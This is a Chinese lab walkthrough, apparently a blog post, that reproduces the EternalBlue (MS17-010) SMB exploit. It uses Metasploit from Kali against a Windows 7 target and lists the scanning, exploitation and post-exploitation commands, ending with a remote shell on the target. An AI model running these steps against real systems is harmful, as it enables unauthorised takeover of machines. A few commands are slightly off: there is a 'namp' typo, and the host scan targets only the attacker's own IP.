永恒之蓝漏洞复现
永恒之蓝漏洞复现
一、永恒之蓝漏洞简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
二、实验环境
kali linux(攻击者)
windows 7(靶机)
三、实验步骤
1.信息搜集
- 查看本机(kali linux)IP,可查询到本机的IP为 192.168.60.129
ifconfig

- 查看与本机同一网段的主机IP,可查询到靶机(windows 7)的IP为192.168.60.130.
nmap 192.168.60.129

- 进一步了解靶机信息,得到靶机为window 7
namp -O 192.168.60.130

2.开始攻击
- 启动msf
msfconsole

- 使用exploit/windows/smb/ms17_010_eternalblue进行攻击
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue


- 查看漏洞基本设置
show options

- 设置目标IP为192.168.60.130
set RHOSTS 192.168.60.130

- 开始执行
run

3.继续攻击
sysinfo ///查看主机信息
getuid ///获取靶机用户名
screenshot ///对靶机进行截图
shell ///获取靶机控制台


浙公网安备 33010602011771号